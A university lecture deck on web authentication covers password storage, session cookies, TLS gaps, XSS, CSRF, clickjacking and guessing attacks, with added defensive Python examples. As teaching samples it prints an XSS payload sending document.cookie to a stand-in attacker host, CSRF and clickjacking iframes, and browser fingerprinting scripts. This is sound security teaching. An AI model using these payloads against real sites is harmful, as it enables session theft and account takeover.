User authentication on the web, Joseph Bonneau

SLIDE 1

User authentication on the web

Joseph Bonneau jcb82@cl.cam.ac.uk

Computer Laboratory

Part II Security lecture 2012

  • J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 1 / 41

SLIDE 2

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
4. Can we do better?

SLIDE 3

The web was not designed with authentication in mind

SLIDE 4

The web was not designed with authentication in mind

GET / HTTP/1.1
Host: www.cl.cam.ac.uk
128.28.2.138 → www.cl.cam.ac.uk

HTTP/1.1 200 OK
Content-Length: 7661
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 ...
128.28.2.138 ← www.cl.cam.ac.uk

SLIDE 5

Authentication is used for many purposes

Persistent online identities

SLIDE 6

Authentication is used for many purposes

Online linking to offline identity

SLIDE 7

Authentication is used for many purposes

Customising online preferences

SLIDE 8

Authentication is used for many purposes

[Plot: proportion of sites collecting passwords (0.0 to 1.0) against traffic rank (100 to 500)]

Frequency of password collection

SLIDE 9

Many requirements for “perfect” authentication

1. Secure
   1. Criminals (may know target)
   2. Malware
   3. Rogue servers
   4. Phishers
2. Low cost
   1. Easy for users
   2. Cheap for servers
   3. Easy to implement
   4. Widely compatible
3. Privacy-enabling
   1. Users choose to reveal identity
   2. Easy to create new identities
   3. Malicious sites get no information
4. Legal
   1. Non-repudiable (sometimes)
   2. Traceable (sometimes)

SLIDE 10

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
4. Can we do better?

SLIDE 11

Password enrolment

Wall Street Journal, 1996
Wall Street Journal, 2010

SLIDE 12

Password enrolment

<form method="post" action="user_enrol.cgi">
Create a username: <input type="text" name="user"/> <br/>
Choose password: <input type="password" name="pass"/> <br/>
<input type="submit" name="submit" />
</form>
128.28.2.138 ← http://www.example.com/

SLIDE 13

Password enrolment

POST user_enrol.cgi HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

user=jcb82&pass=qwerty
128.28.2.138 → http://www.example.com/

SLIDE 14

Password enrolment

POST user_enrol.cgi HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

user=jcb82&pass=qwerty
128.28.2.138 → https://www.example.com/

SLIDE 15

Password storage

USER   PASS
jcb82  qwerty
rja14  d5bf"_)*(&()"$
mgk25  i_love_fourier
...    ...

SLIDE 16

Password storage

USER   PASS_HASH
jcb82  13e874694bc9
rja14  ddd87e9f571a
mgk25  5b72fba97e14
...    ...

PASS_HASH_i = SHA-256(password_i)

SLIDE 17

Password storage

USER   PASS_HASH
jcb82  13e874694bc9
rja14  ddd87e9f571a
mgk25  5b72fba97e14
...    ...
hk331  13e874694bc9
...    ...

PASS_HASH_i = SHA-256(password_i)

SLIDE 18

Password storage

USER   SALTED_HASH      SALT
jcb82  cfea9edfe0bd...  0cb9...
rja14  9883078e2953...  1f13...
mgk25  a6b02ced143e...  b168...
...    ...              ...
hk331  5dbe4e858597...  3b73...
...    ...              ...

salt_i = random[0:64]
SALTED_HASH_i = SHA-256(password_i || salt_i)^N
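An added Python example, not from the slides, contrasting the storage schemes of slides 16 to 18: it reproduces the jcb82/hk331 collision of an unsalted hash, then enrols and verifies users under a per-user 64-bit salt with the hash iterated N times. The sample passwords, N = 10,000 and the reading of the superscript as N-fold iteration are assumptions of this example.

```python
import hashlib
import hmac
import os

# Constructed sample credentials modelled on the slide's USER/PASS table;
# hk331 deliberately shares jcb82's password, as on slide 17.
SAMPLE_PASSWORDS = {
    "jcb82": "qwerty",
    "rja14": 'd5bf"_)*(&()"$',
    "mgk25": "i_love_fourier",
    "hk331": "qwerty",
}

ITERATIONS = 10_000  # N in SHA-256(password || salt)^N; assumed value for this example


def unsalted_hash(password: str) -> str:
    """Slide 16: PASS_HASH_i = SHA-256(password_i)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def shared_hashes(passwords: dict) -> list:
    """Groups of users whose unsalted hashes collide: cracking one entry
    reveals every user in the group, and one precomputed table serves all."""
    by_hash = {}
    for user, pw in passwords.items():
        by_hash.setdefault(unsalted_hash(pw), []).append(user)
    return [sorted(users) for users in by_hash.values() if len(users) > 1]


def salted_hash(password: str, salt: bytes, iterations: int = ITERATIONS) -> str:
    """Slide 18, read as: hash password || salt, then re-hash the digest
    N-1 more times so that every guess costs N hash computations."""
    digest = hashlib.sha256(password.encode("utf-8") + salt).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha256(digest).digest()
    return digest.hex()


def enrol(db: dict, user: str, password: str) -> None:
    """Store (SALTED_HASH_i, salt_i); salt_i = random[0:64] is 64 fresh bits."""
    salt = os.urandom(8)
    db[user] = (salted_hash(password, salt), salt)


def verify(db: dict, user: str, password: str) -> bool:
    """Recompute the salted hash and compare it in constant time."""
    record = db.get(user)
    if record is None:
        # Do the same work for unknown users so that response time does
        # not reveal which usernames exist.
        salted_hash(password, b"\x00" * 8)
        return False
    stored, salt = record
    return hmac.compare_digest(stored, salted_hash(password, salt))


def build_salted_db(passwords: dict) -> dict:
    db = {}
    for user, pw in passwords.items():
        enrol(db, user, pw)
    return db


if __name__ == "__main__":
    print("unsalted collisions:", shared_hashes(SAMPLE_PASSWORDS))    # [['hk331', 'jcb82']]
    db = build_salted_db(SAMPLE_PASSWORDS)
    print("salted jcb82 == hk331:", db["jcb82"][0] == db["hk331"][0])  # False
    print("login jcb82/qwerty:", verify(db, "jcb82", "qwerty"))        # True
    print("login jcb82/qwertz:", verify(db, "jcb82", "qwertz"))        # False
```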

SLIDE 19

Login

POST login.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

name=jcb82&pass=qwerty
128.28.2.138 → https://www.example.com

SLIDE 20

Login

HTTP/1.1 302 Moved Temporarily
Host: www.example.com
Location: http://www.example.com/main
Set-Cookie: user_id=821183; expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/;
Set-Cookie: auth=f0eb6a1bdff... expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/;
Content-Length: 0
128.28.2.138 ← https://www.example.com

SLIDE 21

Login

GET /main.html HTTP/1.1
Host: www.example.com
Cookie: user_id=821183; auth=f0eb6a1bdff...
128.28.2.138 → http://www.example.com

SLIDE 22

Logout

POST logout.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
128.28.2.138 → www.example.com

SLIDE 23

Logout

HTTP/1.1 302 Moved Temporarily
Host: www.example.com
Location: http://www.example.com/main
Set-Cookie: user_id=0; path=/;
Set-Cookie: auth=0; path=/;
Content-Length: 0
128.28.2.138 ← www.example.com

SLIDE 24

Update

SLIDE 25

Recovery

SLIDE 26

Recovery

Hi jbonneau,

Someone requested that your Last.fm password be reset. If this wasn't you, there's nothing to worry about - simply ignore this email and nothing will change.

If you DID ask to reset the password on your Last.fm account, just click here to make it happen:
http://www.last.fm/?id=<userid>&key=<authentication-token>

Best Regards,
The Last.fm Team

SLIDE 27

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
   1. Technical failures (false authentication)
   2. User interface failures
   3. Human memory failures
   4. Economic failures
   5. Technical failures (unintended authentication)
4. Can we do better?

SLIDE 28

Plaintext passwords sent over SMTP

Dear Joseph Bonneau,

You requested us to send you your EasyChair login information. Please use the following data to log in to EasyChair:

User name: jbonneau
Password: qwerty

Best regards,
EasyChair Messenger.

Password recovery, EasyChair

SLIDE 29

Insecure at-rest storage of passwords

29-50% of sites store passwords in the clear

SLIDE 30

Insecure at-rest storage of passwords

RockYou SQL injection hack January 2010

SLIDE 31

Incomplete TLS deployment

SLIDE 32

Incomplete TLS deployment

Password sniffing

SLIDE 33

Incomplete TLS deployment

<form method="post" action="https://www.example.com/user_login.cgi">
Username: <input type="text" name="user" /> <br />
Password: <input type="password" name="pass" /> <br />
<input type="submit" name="submit" />
</form>

Post-only TLS deployment

SLIDE 34

Incomplete TLS deployment

TLS deployment   I     E     C     Tot.
Full             0.07  0.26  0.07  0.39
Full/POST        0.02  0.01  0.01  0.03
Inconsistent     0.09  0.04  0.03  0.17
None             0.15  0.03  0.23  0.41

SLIDE 35

Cookie theft post-TLS

Wireshark

SLIDE 36

Cookie theft post-TLS

Firesheep

SLIDE 37

Cookie stealing via cross-site scripting

SLIDE 38

Cookie stealing via cross-site scripting

Your submission will reference:<br/>
http:www.espn.com/college-football

http://dynamic.espn.go.com/bugs?url=http:www.espn.com/college-football

SLIDE 39

Cookie stealing via cross-site scripting

Your submission will reference:<br/>
<script>
document.location = "http://www.attacker.com/cookie-log.cgi?" + document.cookie
</script>

http://dynamic.espn.go.com/bugs?url=%3Cscript%3E%0Adocument.location+%3D%0A%22http%3A//www.attacker.com/cookie-log.cgi%3F%22%0A%2B+document.cookie%0A%3C/script%3E

SLIDE 40

Weak cookies

SID         UID    Other data
3943412586  rja14  ...
3943412587  mgk25  ...
3943412588  jcb82  ...
...         ...    ...

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 41

Weak cookies

SID                  UID    Other data
2010-11-15T12:06:43  rja14  ...
2010-11-15T12:07:38  mgk25  ...
2010-11-15T12:08:11  jcb82  ...
...                  ...    ...

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 42

Weak cookies

SID                     UID    Other data
H(2010-11-15T12:06:43)  rja14  ...
H(2010-11-15T12:07:38)  mgk25  ...
H(2010-11-15T12:08:11)  jcb82  ...
...                     ...    ...

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 43

Weak cookies

COOKIE_i = i || crypt(i || K_daily)

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 44

Weak cookies

COOKIE_i = i || crypt(i || K_daily)

COOKIE_jbonneau  = jbonneau7c19f550a775b614
COOKIE_jbonneau1 = jbonneau17c19f550a775b614

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 45

Weak cookies

COOKIE_i = i || crypt(i || K_daily)

COOKIE_jbonnea    = jbonneac6ceb34c403d1f6d
COOKIE_jbonneaN   = jbonneaNc6ceb34c403d1f6d
COOKIE_j          = j938c00d2f12c73a4
COOKIE_jNov201999 = jNov201999938c00d2f12c73a4

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 46

Weak cookies

COOKIE_i = i || t || MAC_k(i || t)

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001

SLIDE 47

Weak cookies

COOKIE_i = i || t || MAC_k(i || t)

COOKIE_jcb82(1-Dec-2010) = jcb821-Dec-20105ca57512f4db8fd18254adce9b8ef438 = COOKIE_jcb8(21-Dec-2010)

Predictable session identifiers
Misuse of cryptography
Improper field delimitation

Fu et al., 2001
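An added Python example, not from the slides, of the field-delimitation failure on slide 47 and its fix: with bare concatenation, (jcb82, 1-Dec-2010) and (jcb8, 21-Dec-2010) give the same MAC input, so one user's cookie is also a valid cookie for another; length-prefixing each field before MACing removes the ambiguity. The key, the netstring-style encoding and the parser are this example's assumptions.

```python
import hashlib
import hmac

# Constructed demo key; a real server key is long, random and secret.
KEY = b"constructed-demo-key-not-for-real-use"
TAG_LEN = 64  # hex length of an HMAC-SHA256 tag


def mac(message: str) -> str:
    return hmac.new(KEY, message.encode("utf-8"), hashlib.sha256).hexdigest()


def cookie_concat(user: str, date: str) -> str:
    """Slide 47: COOKIE_i = i || t || MAC_k(i || t) with bare concatenation.
    The MAC input does not record where i ends and t begins."""
    body = user + date
    return body + mac(body)


def encode_fields(fields: list) -> str:
    """Length-prefix every field (netstring style, "5:jcb82") so that the
    field boundaries are part of what the MAC covers."""
    return "".join(f"{len(f)}:{f}" for f in fields)


def decode_fields(body: str) -> list:
    """Inverse of encode_fields; raises ValueError on malformed input."""
    fields, pos = [], 0
    while pos < len(body):
        colon = body.index(":", pos)
        n = int(body[pos:colon])
        start = colon + 1
        if start + n > len(body):
            raise ValueError("truncated field")
        fields.append(body[start:start + n])
        pos = start + n
    return fields


def cookie_delimited(user: str, date: str) -> str:
    """The same scheme with unambiguous field delimitation."""
    body = encode_fields([user, date])
    return body + mac(body)


def parse_cookie(cookie: str):
    """Verify the tag first (constant-time compare), then split the fields.
    Returns (user, date), or None for a forged, truncated or malformed cookie."""
    if len(cookie) < TAG_LEN:
        return None
    body, tag = cookie[:-TAG_LEN], cookie[-TAG_LEN:]
    if not hmac.compare_digest(tag, mac(body)):
        return None
    try:
        fields = decode_fields(body)
    except ValueError:
        return None
    if len(fields) != 2:
        return None
    return fields[0], fields[1]


if __name__ == "__main__":
    a = cookie_concat("jcb82", "1-Dec-2010")
    b = cookie_concat("jcb8", "21-Dec-2010")
    print("concatenation ambiguous:", a == b)                                    # True
    c = cookie_delimited("jcb82", "1-Dec-2010")
    print("delimited parses as:", parse_cookie(c))                                # ('jcb82', '1-Dec-2010')
    print("delimited ambiguous:", c == cookie_delimited("jcb8", "21-Dec-2010"))  # False
    print("re-split body with old tag:", parse_cookie("5:jcb8211:21-Dec-2010" + c[-TAG_LEN:]))  # None
```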

SLIDE 48

Cross-site request forgery

<iframe name="csrf" width="0" height="0" frameborder="0"
  src="http://bank.example.com/transfer?&amount=1000000&to=attacker">
</iframe>

SLIDE 49

Cross-site request forgery

<iframe name="csrf" width="0" height="0" frameborder="0"
  src="http://twitter.com/share/update?status=i%20got%20pwned">
</iframe>
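An added Python example, not from the slides, of the server-side check that defeats the hidden-iframe requests on slides 48 and 49: the browser attaches the victim's session cookie to the forged request, but the attacking page cannot supply the per-session token that the transfer handler demands, and state changes are refused on GET altogether. The handler, the parameter names and the in-memory session store are assumptions of this example.

```python
import hmac
import secrets

# In-memory session store, constructed for this example:
# session id -> {"user": ..., "csrf": per-session token}
SESSIONS = {}


def login(user: str) -> str:
    """Issue a session cookie value and a per-session CSRF token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid


def csrf_token(sid: str) -> str:
    """Embedded in the site's own forms; a third-party page cannot read it,
    because the same-origin policy keeps it from other origins."""
    return SESSIONS[sid]["csrf"]


def handle_transfer(request: dict) -> tuple:
    """Server side of bank.example.com/transfer (handler name assumed).
    request = {"method": ..., "cookies": {...}, "params": {...}}.
    Returns (status code, message)."""
    session = SESSIONS.get(request.get("cookies", {}).get("sid", ""))
    if session is None:
        return 401, "not logged in"
    if request.get("method") != "POST":
        # The slide's hidden iframe issues a GET; state changes must not
        # happen on GET at all.
        return 405, "transfers require POST"
    params = request.get("params", {})
    sent = params.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session["csrf"].encode()):
        # The browser attached the cookie automatically, but a forged
        # cross-site request cannot carry the token.
        return 403, "missing or invalid CSRF token"
    try:
        amount = int(params["amount"])
        to = params["to"]
    except (KeyError, ValueError):
        return 400, "bad parameters"
    return 200, f"{session['user']} transferred {amount} to {to}"


def iframe_request(sid: str) -> dict:
    """What the slide's <iframe src="http://bank.example.com/transfer?...">
    arrives as: the victim's cookie is attached, nothing else."""
    return {"method": "GET", "cookies": {"sid": sid},
            "params": {"amount": "1000000", "to": "attacker"}}


def legitimate_request(sid: str, amount: int, to: str) -> dict:
    """A POST from the site's own form, which carries the session's token."""
    return {"method": "POST", "cookies": {"sid": sid},
            "params": {"amount": str(amount), "to": to, "csrf_token": csrf_token(sid)}}


if __name__ == "__main__":
    sid = login("jcb82")
    print(handle_transfer(iframe_request(sid)))                    # (405, 'transfers require POST')
    print(handle_transfer(legitimate_request(sid, 10, "rja14")))   # (200, 'jcb82 transferred 10 to rja14')
```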

SLIDE 50

Clickjacking

http://www.facebook.com/connect/uiserver.php?app_id=102452128776

SLIDE 51

Clickjacking

<iframe name="csrf" width="0" height="0" frameborder="0"
  src="http://www.facebook.com/connect/uiserver.php?app_id=102452128776"
  style="opacity: 0; filter: alpha(opacity=0); position: absolute; top: -170px; left: -418px;">
</iframe>
<img src="clickjacking_bait.jpg">

SLIDE 52

Clickjacking

SLIDE 53

Clickjacking

SLIDE 54

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
   1. Technical failures (false authentication)
   2. User interface failures
   3. Human memory failures
   4. Economic failures
   5. Technical failures (unintended authentication)
4. Can we do better?

SLIDE 55

No trusted path between users and browser

(a) Hand tracking analysis. Rectangles identify regions in movement. Black rectangles are used for movements in the hands regions, grey rectangles for keys, white rectangles for regions where both hand and key movement happens. These rectangles identify likely key pressings. (b) Key pressing analysis. Using occlusion-based techniques, the analysis determines keys that are not pressed, which are represented by the dark polygons.

Balzarotti et al. 2008

SLIDE 56

No trusted path between users and browser

Hardware keylogger, US$36

SLIDE 57

No trusted path between users and browser

Software keylogger, US$49.50

SLIDE 58

No trusted path between users and browser

Phishing (Firefox)

SLIDE 59

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
   1. Technical failures (false authentication)
   2. User interface failures
   3. Human memory failures
   4. Economic failures
   5. Technical failures (unintended authentication)
4. Can we do better?

SLIDE 60

Brute-force attacks

123456 12345 123456789 password iloveyou princess 1234567 rockyou 12345678 abc123 nicole daniel babygirl monkey lovely jessica 654321 michael

SLIDE 61

Brute-force attacks

Rate limiting (Truthdig)

SLIDE 62

Brute-force attacks

Forced reset (Cafe Press)

SLIDE 63

Brute-force attacks

CAPTCHA restrictions (Wikipedia)

SLIDE 64

Brute-force attacks

countermeasure  I     E     C     Tot.
CAPTCHA         0.07  0.01  0.01  0.09
timeout         0.01  0.01  0.01  0.03
reset           0.01  0.02  0.01  0.03
none            0.25  0.29  0.31  0.84

SLIDE 65

Brute-force attacks

limit  I     E     C     Tot.
3      0.02  0.00  0.00  0.02
4      0.01  0.01  0.00  0.01
5      0.02  0.01  0.03  0.06
6      0.01  0.01  0.00  0.03
7      0.01  0.00  0.00  0.01
10     0.01  0.00  0.00  0.01
15     0.01  0.00  0.00  0.01
20     0.00  0.01  0.00  0.01
25     0.01  0.00  0.00  0.01
> 100  0.25  0.29  0.31  0.84

SLIDE 66

Brute-force attacks

[Plot: marginal work ˜µα (bits, 5 to 35) against success rate α (0.0 to 1.0); series: Yahoo! [2011], Battlefield Heroes [2011], Gawker [2010], RockYou [2009], Morris [79], Klein [90]]

SLIDE 67

Personal knowledge questions

SLIDE 68

Personal knowledge questions

Web search: used against Sarah Palin in 2008

Public records: Griffith et al.: 30% of individuals’ mother’s maiden names

Social engineering: dumpster diving, burglary

Acquaintance attacks: Schechter et al.: ∼25% of questions guessed by friends and family

SLIDE 69

Personal knowledge questions

70% of answers are proper names (Just et al. 2008)

25% surname 10% forename 15% pet name 20% place name

Most others are trivially insecure

What is my favourite colour?
What is the worst day of the week?

SLIDE 70

Personal knowledge questions

[Plot: marginal guesswork ˜µα (5 to 40) against success rate α (0.0 to 1.0); series: Forename, Surname, Password [RockYou], Password [Klein], Password [Spafford], Password [Schneier]]

Personal knowledge worse than passwords (Bonneau et al. 2010)

SLIDE 71

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
   1. Technical failures (false authentication)
   2. User interface failures
   3. Human memory failures
   4. Economic failures
   5. Technical failures (unintended authentication)
4. Can we do better?

SLIDE 72

Systemic trends in web authentication

[Plot: proportion of sites collecting passwords (0.0 to 1.0) against traffic rank (100 to 500)]

All sites collect passwords
All sites utilise email infrastructure: naming, liveness checks, password recovery

SLIDE 73

Systemic trends in web authentication

All sites collect passwords
All sites utilise email infrastructure: naming, liveness checks, password recovery

SLIDE 74

Economic models

Password over-collection is a tragedy of the commons
Password insecurity is a negative externality

SLIDE 75

Economic models

Password over-collection is a tragedy of the commons
Password insecurity is a negative externality

SLIDE 76

Consequences

[Plot: proportion of sites collecting passwords (0.0 to 1.0) against traffic rank (100 to 500)]

Users overwhelmed by password burden

Average person has > 25 accounts (Florêncio et al., 2007)

Users forced to re-use passwords across security contexts
Cross-site password compromise increasing

Email accounts becoming powerful credentials

SLIDE 77

Consequences

[Plot: password score against page views per million (log scale, 1E-2 to 1E+5); series: E-commerce, News/Customization, User interaction]

Users overwhelmed by password burden

Average person has > 25 accounts (Florêncio et al., 2007)

Users forced to re-use passwords across security contexts
Cross-site password compromise increasing

Email accounts becoming powerful credentials

SLIDE 78

Consequences

Users overwhelmed by password burden

Average person has > 25 accounts (Florêncio et al., 2007)

Users forced to re-use passwords across security contexts
Cross-site password compromise increasing

Email accounts becoming powerful credentials

SLIDE 79

Consequences

Users overwhelmed by password burden

Average person has > 25 accounts (Florêncio et al., 2007)

Users forced to re-use passwords across security contexts
Cross-site password compromise increasing

Email accounts becoming powerful credentials

SLIDE 80

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
   1. Technical failures (false authentication)
   2. User interface failures
   3. Human memory failures
   4. Economic failures
   5. Technical failures (unintended authentication)
4. Can we do better?

SLIDE 81

Implicit identifiers

SRC: 128.232.8.168 DST: 128.232.0.20 ...

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 82

Implicit identifiers

GET / HTTP/1.1
Host: www.cl.cam.ac.uk
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12
Accept: text/html, application/xhtml+xml, application/xml; q=0.9,*/*
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 83

Implicit identifiers

GET / HTTP/1.1
Host: www.cl.cam.ac.uk
Referer: http://www.bing.com/search?q=what%27s+the+best+university

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 84

Implicit identifiers

GET / HTTP/1.1
Host: www.cl.cam.ac.uk
Referer: http://www.facebook.com/profile.php?id=1511359465

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 85

Implicit identifiers

//detect screen resolution
x = screen.width;
y = screen.height;
//detect plugins
q = navigator.mimeTypes["video/quicktime"];
j = navigator.javaEnabled();
//detect time zone
tz = (new Date()).getTimezoneOffset();

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 86

Implicit identifiers

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 87

Implicit identifiers

# Send users to my detector...
<iframe name="detector" width="0" height="0" frameborder="0"
  src="https://docs.google.com/document/d/1TUV9x1lFAQcVWvhP4EAHQZIPrVmo3_vrz5Sz8Wo">
</iframe>

Narayanan 2009

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 88

Implicit identifiers

Narayanan 2009

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 89

Implicit identifiers

<img id="test" style="display:none">
<script>
test = document.getElementById('test');
var start = new Date();
test.onerror = function() { time = new Date() - start; };
test.src = "http://www.example.com/";
</script>

Bortz et al. 2007

1. IP address
2. HTTP headers
3. HTTP referer
4. Javascript runtime (also Flash, Java, Silverlight ...)
5. Cross-site de-anonymisation

SLIDE 90

Talk outline

1. What are we trying to achieve?
2. What’s done in practice
3. What goes wrong
4. Can we do better?

SLIDE 91

Password alternatives

Mitigates: Guessing attacks, phishing?, malware

SLIDE 92

Password alternatives

Mitigates: Guessing attacks, malware?

SLIDE 93

Password alternatives

Mitigates: Brute-force attacks?, trawling attacks?

SLIDE 94

Password alternatives

[Plot: marginal guesswork ˜µα (5 to 40) against success rate α (0.0 to 1.0); series: Forename, Surname, Password [RockYou], Password [Klein], Password [Spafford], Password [Schneier], Mnemonic [Kuo], Pass-Go, PassPoints, Passfaces]

SLIDE 95

Better password choices

Microsoft password advice

Mitigates: Password guessing

SLIDE 96

Better password choices

To construct a good password, create a simple sentence of 8 words and choose letters from the words to make up a password. You might take the initial or final letters; you should put some letters in upper case to make the password harder to guess; and at least one number and/or special character should be inserted as well. Use this method to generate a password of 7 or 8 characters.

Yan et al. 2004

Mitigates: Password guessing

SLIDE 97

Better password choices

[Plot: marginal guesswork ˜µα (5 to 40) against success rate α (0.0 to 1.0); series: Forename, Surname, Password [RockYou], Password [Klein], Password [Spafford], Password [Schneier], Mnemonic [Kuo]]

SLIDE 98

Better password choices

Mitigates: Password guessing

SLIDE 99

Better password choices

twttr.BANNED_PASSWORDS = [ ... ];   (JavaScript listing of Twitter's banned password strings; the list itself is elided)

Twitter banned password list

Mitigates: Password guessing

SLIDE 100

Better password choices

diceware
166651565315653563223561665224
1 6 6 6 5  cleft
1 5 6 5 3  cam
5 6 3 2 2  synod
3 5 6 1 6  lacy
6 5 2 2 4  yr
password = cleftcamsynodlacyyr

Diceware

Mitigates: Password guessing

SLIDE 101

Better password choices

More can be less...

SLIDE 102

Password managers

Chrome password manager

Mitigates: password recovery, weak passwords?

SLIDE 103

Password managers

Password Manager Pro™ Mitigates: password recovery, weak passwords?

SLIDE 104

Password managers

PwdHash (Firefox extension) Mitigates: password recovery, weak passwords, password re-use, cross-site password compromise

SLIDE 105

Password managers

PwdHash (remote interface) Mitigates: password recovery, weak passwords, password re-use, cross-site password compromise

SLIDE 106

Better backup authentication

Mitigates: Question guessing, email as failure point

SLIDE 107

Better backup authentication

Schechter et al. 2008

Mitigates: Question guessing, email as failure point

SLIDE 108

Better backup authentication

Schechter et al. 2008

Mitigates: Question guessing, email as failure point

SLIDE 109

Better backup authentication

Mitigates: Question guessing, email as failure point

SLIDE 110

Better backup authentication

Mitigates: Account takeover

SLIDE 111

Better cookie semantics

HTTP/1.1 302 Moved Temporarily
Host: www.example.com
Location: http://www.example.com/main
Set-Cookie: user_id=821183; expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/;
Set-Cookie: auth=f0eb6a1bdff... expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/; httponly;
Content-Length: 0

128.28.2.138 ← https://www.example.com

Mitigates: cross-site scripting

SLIDE 112

Better cookie semantics

HTTP/1.1 302 Moved Temporarily
Host: www.example.com
Location: http://www.example.com/main
Set-Cookie: user_id=821183; expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/;
Set-Cookie: auth=f0eb6a1bdff... expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/; secure;
Content-Length: 0

128.28.2.138 ← https://www.example.com

Mitigates: post-TLS cookie stealing
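An added check, not from the slides, that audits the Set-Cookie headers of a raw response like the two above for the httponly and secure attributes and can append whichever is missing; the response text is constructed from the slide, with the elided auth token replaced by the placeholder TOKEN.

```python
# Constructed sample input: the 302 response from the slide, with the elided
# auth token replaced by the placeholder TOKEN.
RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Location: http://www.example.com/main\r\n"
    "Set-Cookie: user_id=821183; expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/\r\n"
    "Set-Cookie: auth=TOKEN; expires=Sat, 11-Dec-2010 15:48:38 GMT; path=/; httponly\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

WANTED = ("HttpOnly", "Secure")   # the two attributes the slides add

def set_cookie_headers(raw):
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values

def audit_cookie(header_value):
    """Return (cookie name, set of missing attributes) for one Set-Cookie value.
    Attribute names are matched case-insensitively, as browsers do."""
    parts = [p.strip() for p in header_value.split(";")]
    cookie_name = parts[0].split("=", 1)[0]
    present = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return cookie_name, {a for a in WANTED if a.lower() not in present}

def audit_response(raw):
    """Map each cookie set by the response to the attributes it lacks."""
    return dict(audit_cookie(v) for v in set_cookie_headers(raw))

def harden(header_value):
    """Append whatever of HttpOnly / Secure the Set-Cookie value is missing."""
    _, missing = audit_cookie(header_value)
    return header_value + "".join(f"; {a}" for a in WANTED if a in missing)

if __name__ == "__main__":
    for name, missing in audit_response(RESPONSE).items():
        print(f"{name}: missing {sorted(missing) or 'nothing'}")
```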

SLIDE 113

Designed login protocols

GET / HTTP/1.1
Host: www.example.com

128.28.2.138 → www.example.com

HTTP/1.1 401 Authorization Required
Content length: 7661
Content-Type: text/html
WWW-Authenticate: Basic realm="example.com"

128.28.2.138 ← www.example.com

HTTP basic access authentication Mitigates: cookie theft

SLIDE 114

Designed login protocols

HTTP basic access authentication Mitigates: cookie theft

SLIDE 115

Designed login protocols

GET / HTTP/1.1
Host: www.example.com
Authorization: Basic amNiODI6bmljZXRyeQ==

128.28.2.138 → www.example.com

auth = encodebase64(user||pass)   (here the credential decodes to jcb82:nicetry)

HTTP basic access authentication Mitigates: cookie theft

SLIDE 116

Designed login protocols

GET / HTTP/1.1
Host: www.example.com

128.28.2.138 → www.example.com

HTTP/1.1 401 Authorization Required
Content length: 7661
Content-Type: text/html
WWW-Authenticate: Digest realm="example.com" qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093"

128.28.2.138 ← www.example.com

HTTP digest access authentication Mitigates: password sniffing, database compromise

SLIDE 117

